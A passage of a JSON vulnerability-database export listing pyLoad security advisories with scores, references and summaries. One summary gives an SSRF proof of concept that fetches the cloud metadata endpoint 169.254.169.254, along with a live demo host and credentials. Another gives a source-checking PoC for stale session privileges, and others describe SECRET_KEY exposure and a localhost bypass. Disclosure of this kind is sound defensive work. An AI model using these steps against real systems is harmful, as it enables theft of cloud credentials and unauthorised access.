"https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h2", "reference_id": "GHSA-h73m-pcfw-25h2", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-05-09T23:56:34Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38748?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev75", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-nbnk-6g72-3ybk" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-tbkm-qa82-jkaw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzcg-gg18-9uhg" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xhbh-mwv5-wfgf" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev75" } ], "aliases": [ "CVE-2023-47890", "GHSA-h73m-pcfw-25h2" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pgh8-2pmw-7ba7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89456?format=api", "vulnerability_id": "VCID-qg7b-ayq5-8bax", "summary": "pyLoad has Stale Session Privilege After Role/Permission Change (Privilege Revocation Bypass)\n### Summary\npyLoad caches `role` and `permission` in the session at login and continues to authorize requests using these cached values, even after an admin changes the user's role/permissions in the database.\n\nAs a result, an already logged-in user can keep old (revoked) privileges until logout/session expiry, enabling continued privileged actions.\n\nThis is a core authorization/session-consistency issue and is not resolved by toggling an optional security feature.\n\n### Details\nThe WebUI auth flow stores authorization state in session:\n\n- `src/pyload/webui/app/helpers.py:187-200`\n - `set_session(...)` writes:\n - `\"role\": user_info[\"role\"]`\n - `\"perms\": user_info[\"permission\"]`\n\nAuthorization checks later trust cached session values:\n\n- `src/pyload/webui/app/helpers.py:134-151`\n - `parse_permissions(...)` reads `session.get(\"role\")` / `session.get(\"perms\")`\n- `src/pyload/webui/app/helpers.py:225-230`\n - `is_authenticated(...)` only verifies `authenticated` and `api.user_exists(user)` (existence), not fresh role/permission\n- `src/pyload/webui/app/helpers.py:267-275`\n - `login_required(...)` uses `parse_permissions(s)` for allow/deny decisions\n- `src/pyload/webui/app/helpers.py:356-365`\n - API session auth path also trusts `s[\"role\"]` and `s[\"perms\"]`\n\nRole/permission updates are written to DB but active sessions are not invalidated/refreshed:\n\n- `src/pyload/webui/app/blueprints/json_blueprint.py:389-434`\n - `update_users(...)` calls `api.set_user_permission(...)` and returns\n- `src/pyload/core/api/__init__.py:1643-1645`\n - `set_user_permission(...)` updates DB role/permission only\n\nDefault exposure window is long:\n\n- `src/pyload/core/config/default.cfg:47`\n - `session_lifetime = 44640` minutes (~31 days)\n\nTherefore, privilege revocation is not enforced immediately for active sessions.\n\nNote on duplicates:\n- This appears distinct from CVE-2023-0227 (session validity after **user deletion**) because this report is about stale authorization after **role/permission changes** while the user still exists.\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nRepro: stale session privilege after role/permission changes.\n\nThis PoC is source-based and leaves no persistent state.\nIt validates that:\n1) Role/permission are cached into session at login.\n2) Authorization checks read role/permission from session, not fresh DB values.\n3) User updates write DB permission/role without invalidating active sessions.\n4) Default session lifetime is long, increasing stale-privilege exposure window.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport pathlib\nimport re\nfrom typing import Iterable\n\n\nROOT = pathlib.Path(__file__).resolve().parent / \"pyload\" / \"src\" / \"pyload\"\n\n\ndef read(rel: str) -> str:\n return (ROOT / rel).read_text(encoding=\"utf-8\")\n\n\ndef has_any(text: str, patterns: Iterable[str]) -> bool:\n return all(re.search(p, text, re.MULTILINE) for p in patterns)\n\n\ndef main() -> None:\n helpers = read(\"webui/app/helpers.py\")\n json_blueprint = read(\"webui/app/blueprints/json_blueprint.py\")\n api_init = read(\"core/api/__init__.py\")\n default_cfg = (ROOT / \"core/config/default.cfg\").read_text(encoding=\"utf-8\")\n\n checks = {\n \"set_session_caches_role_perms\": has_any(\n helpers,\n [\n r'def\\\\s+set_session\\\\(',\n r'\"role\"\\\\s*:\\\\s*user_info\\\\[\"role\"\\\\]',\n r'\"perms\"\\\\s*:\\\\s*user_info\\\\[\"permission\"\\\\]',\n ],\n ),\n \"is_authenticated_only_checks_user_exists\": has_any(\n helpers,\n [\n r'def\\\\s+is_authenticated\\\\(',\n r'api\\\\s*=\\\\s*flask\\\\.current_app\\\\.config\\\\[\"PYLOAD_API\"\\\\]',\n r'return\\\\s+authenticated\\\\s+and\\\\s+api\\\\.user_exists\\\\(user\\\\)',\n ],\n ),\n \"parse_permissions_reads_session_cache\": has_any(\n helpers,\n [\n r'def\\\\s+parse_permissions\\\\(',\n r'session\\\\.get\\\\(\"role\"\\\\)\\\\s*==\\\\s*Role\\\\.ADMIN',\n r'session\\\\.get\\\\(\"perms\"\\\\)',\n ],\n ),\n \"login_required_uses_parse_permissions_session\": has_any(\n helpers,\n [\n r'def\\\\s+login_required\\\\(',\n r'if\\\\s+is_authenticated\\\\(s\\\\):',\n r'perms\\\\s*=\\\\s*parse_permissions\\\\(s\\\\)',\n ],\n ),\n \"api_session_auth_uses_cached_role_perms\": has_any(\n helpers,\n [\n r'if\\\\s+is_authenticated\\\\(s\\\\):',\n r'\"role\"\\\\s*:\\\\s*s\\\\[\"role\"\\\\]',\n r'\"permission\"\\\\s*:\\\\s*s\\\\[\"perms\"\\\\]',\n ],\n ),\n \"update_users_changes_db_without_session_invalidation\": has_any(\n json_blueprint,\n [\n r'def\\\\s+update_users\\\\(',\n r'api\\\\.set_user_permission\\\\(name,\\\\s*data\\\\[\"permission\"\\\\],\\\\s*data\\\\[\"role\"\\\\]\\\\)',\n r'return\\\\s+jsonify\\\\(True\\\\)',\n ],\n ),\n \"set_user_permission_only_updates_db\": has_any(\n api_init,\n [\n r'def\\\\s+set_user_permission\\\\(',\n r'self\\\\.pyload\\\\.db\\\\.set_permission\\\\(user,\\\\s*permission\\\\)',\n r'self\\\\.pyload\\\\.db\\\\.set_role\\\\(user,\\\\s*role\\\\)',\n ],\n ),\n \"default_session_lifetime_long\": re.search(\n r'session_lifetime\\\\s*:\\\\s*\"Session lifetime \\\\(minutes\\\\)\"\\\\s*=\\\\s*44640',\n default_cfg,\n re.MULTILINE,\n )\n is not None,\n }\n\n for name, ok in checks.items():\n print(f\"{name}={ok}\")\n\n stale_privilege_repro_success = all(checks.values())\n print(f\"stale_privilege_repro_success={stale_privilege_repro_success}\")\n\n # Cleanup: this PoC creates/modifies no runtime/data files.\n print(\"cleanup_done=True\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n```text\nset_session_caches_role_perms=True\nis_authenticated_only_checks_user_exists=True\nparse_permissions_reads_session_cache=True\nlogin_required_uses_parse_permissions_session=True\napi_session_auth_uses_cached_role_perms=True\nupdate_users_changes_db_without_session_invalidation=True\nset_user_permission_only_updates_db=True\ndefault_session_lifetime_long=True\nstale_privilege_repro_success=True\ncleanup_done=True\n```\n\n### Impact\n- Privilege revocation is not immediate for active sessions.\n- A user can continue using stale, previously granted privileges (including admin) after downgrade/restriction.\n- This can allow continued access to privileged WebUI/API actions until session expiry or manual logout/session reset.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41133", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.1372", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41133" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T18:31:55Z/" } ], "url": "https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-66hx-chf7-3332", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T18:31:55Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-66hx-chf7-3332" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41133", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41133" }, { "reference_url": "https://github.com/advisories/GHSA-66hx-chf7-3332", "reference_id": "GHSA-66hx-chf7-3332", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-66hx-chf7-3332" } ], "fixed_packages": [], "aliases": [ "CVE-2026-41133", "GHSA-66hx-chf7-3332" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qg7b-ayq5-8bax" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89793?format=api", "vulnerability_id": "VCID-qmbx-7s8b-4khw", "summary": "pyLoad's Session Not Invalidated After Permission Changes\n### Summary\nThe `pyload` application does not properly invalidate or modify sessions upon changes made to a user's permissions.\n\n### Details\nWhenever an administrator changes the permissions a specific account has, they do not expect that account still being able to access data that their new permissions do not allow. This is not the case for the `pyload` application, as a user with a valid session can still perform the actions.\n\n### PoC\nTake a user with all the permissions, as shown below.\n\n\nWe now log in as this user.\n\n\nLet us now take away all the permissions.\n\n\nThe logged in session can still be used to access everything in the application.\n\n\n### Impact\nShould permissions be taken away, then the user is expected not to be able to execute the actions belonging to those actions anymore.", "references": [ { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-fj52-5g4h-gmq8", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-fj52-5g4h-gmq8" }, { "reference_url": "https://github.com/advisories/GHSA-fj52-5g4h-gmq8", "reference_id": "GHSA-fj52-5g4h-gmq8", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-fj52-5g4h-gmq8" } ], "fixed_packages": [], "aliases": [ "GHSA-fj52-5g4h-gmq8" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qmbx-7s8b-4khw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46798?format=api", "vulnerability_id": "VCID-tbkm-qa82-jkaw", "summary": "Improper Access Control\npyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-21644", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.86508", "scoring_system": "epss", "scoring_elements": "0.99431", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-21644" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-01-09T19:55:57Z/" } ], "url": "https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21644", "reference_id": "CVE-2024-21644", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21644" }, { "reference_url": "https://github.com/advisories/GHSA-mqpq-2p68-46fv", "reference_id": "GHSA-mqpq-2p68-46fv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mqpq-2p68-46fv" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv", "reference_id": "GHSA-mqpq-2p68-46fv", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-01-09T19:55:57Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38750?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev77", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-nbnk-6g72-3ybk" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xhbh-mwv5-wfgf" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev77" } ], "aliases": [ "CVE-2024-21644", "GHSA-mqpq-2p68-46fv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tbkm-qa82-jkaw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57592?format=api", "vulnerability_id": "VCID-u712-62py-aqgt", "summary": "pyLoad is vulnerable to attacks that bypass localhost restrictions, enabling the creation of arbitrary packages\nAny unauthenticated attacker can bypass the localhost restrictions posed by the application and utilize this to create arbitrary packages.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-7346", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00739", "scoring_system": "epss", "scoring_elements": "0.73275", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-7346" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L21-L36", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L21-L36" }, { "reference_url": "https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L56-L58C11", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L56-L58C11" }, { "reference_url": "https://github.com/pyload/pyload/commit/f4e2d12416ba2dfac7b036d5c8d6dab5461b9840", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/f4e2d12416ba2dfac7b036d5c8d6dab5461b9840" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7346", "reference_id": "CVE-2025-7346", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7346" }, { "reference_url": "https://github.com/advisories/GHSA-x698-5hjm-w2m5", "reference_id": "GHSA-x698-5hjm-w2m5", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-x698-5hjm-w2m5" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5", "reference_id": "GHSA-x698-5hjm-w2m5", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-08T14:13:19Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5" } ], "fixed_packages": [], "aliases": [ "CVE-2025-7346", "GHSA-x698-5hjm-w2m5" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u712-62py-aqgt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91149?format=api", "vulnerability_id": "VCID-ut9v-xcjn-ukb1", "summary": "pyLoad: Server-Side Request Forgery via Download Link Submission Enables Cloud Metadata Exfiltration\n## Summary\n\nPyLoad's download engine accepts arbitrary URLs without validation, enabling Server-Side Request Forgery (SSRF) attacks. An authenticated attacker can exploit this to access internal network services and exfiltrate cloud provider metadata. On DigitalOcean droplets, this exposes sensitive infrastructure data including droplet ID, network configuration, region, authentication keys, and SSH keys configured in user-data/cloud-init.\n\n## Details\n\nThe vulnerability exists in PyLoad's download package functionality (`/api/addPackage` endpoint), which directly passes user-supplied URLs to the download engine without validating the destination. The affected code in `src/pyload/webui/app/blueprints/api_blueprint.py`:\n\n```python\n@bp.route(\"/addPackage\", methods=[\"POST\"], endpoint=\"add_package\")\n@login_required\ndef add_package():\n name = flask.request.form[\"add_name\"]\n links = flask.request.form[\"add_links\"].split(\"\\n\")\n # ... validation omitted ...\n api.add_package(name, links, dest) # No URL validation\n```\n\nThe download engine in `src/pyload/core/managers/download.py` accepts any URL scheme and initiates HTTP requests to arbitrary destinations, including internal network addresses and cloud metadata endpoints.\n\n## Proof of Concept\n\n**Live Demo Instance:** http://143.244.141.81:8000 \n**Credentials:** `pyload` / `pyload`\n\n- Login into the pyload application\n- Navigate to package tab and enter the package name and fill the Link section with the following URL\n\n```\nhttp://169.254.169.254/metadata/v1.json\n```\n\n<img width=\"1851\" height=\"786\" alt=\"image\" src=\"https://github.com/user-attachments/assets/18e7aedf-7663-4a57-8f3e-5200be2c958e\" />\n\n- Now navigate to Files section and download the link.\n\n<img width=\"1429\" height=\"870\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9b8b9cd6-afb7-461c-b058-a3cc4f26e2e6\" />\n\n- It was observed that we are able to Read the Digital Ocean Metadata\n\n<img width=\"1872\" height=\"837\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d30d2d74-53e9-46f8-8206-894a275ac831\" />\n\nThe downloaded `v1.json` file contains sensitive cloud infrastructure data:\n- **Droplet ID**: Unique identifier for the instance\n- **Network Configuration**: Public/private IP addresses, VPC topology\n- **Authentication Keys**: Cloud provider auth tokens\n- **SSH Keys**: Public keys configured in droplet metadata\n- **Region and Datacenter**: Infrastructure location\n\n## Impact\n\n**Vulnerability Type:** Server-Side Request Forgery (SSRF) \n**CVSS Score:** 7.7 - 9.1 (High to Critical, depending on cloud deployment)\n\n### Affected Systems\n- All PyLoad installations (version 0.5.0 and potentially earlier)\n- **Critical Impact** on cloud deployments (AWS EC2, DigitalOcean, Google Cloud, Azure) where metadata contains:\n - IAM credentials (AWS)\n - SSH private keys (configured in user-data)\n - API tokens and secrets\n - Database credentials stored in cloud-init\n\n### Attack Requirements\n- Valid PyLoad user account (any role - ADMIN or USER)\n- Network connectivity to PyLoad instance\n\n### Security Impact\n1. **Cloud Metadata Theft**: Complete exfiltration of instance metadata\n2. **Lateral Movement**: Discovery and enumeration of internal network services\n3. **Credential Exposure**: Theft of cloud IAM credentials, SSH keys, API tokens\n4. **Infrastructure Mapping**: Network topology, IP addressing, service discovery\n\n## Remediation\n\nImplement URL validation in the download engine:\n1. Whitelist allowed URL schemes (http/https only)\n2. Block requests to private IP ranges (RFC 1918, link-local addresses)\n3. Block cloud metadata endpoints (169.254.169.254, metadata.google.internal, etc.)\n4. Implement request destination validation before initiating downloads", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33992", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10068", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33992" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/b76b6d4ee5e32d2118d26afdee1d0a9e57d4bfe8", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-30T18:29:03Z/" } ], "url": "https://github.com/pyload/pyload/commit/b76b6d4ee5e32d2118d26afdee1d0a9e57d4bfe8" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-m74m-f7cr-432x", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": 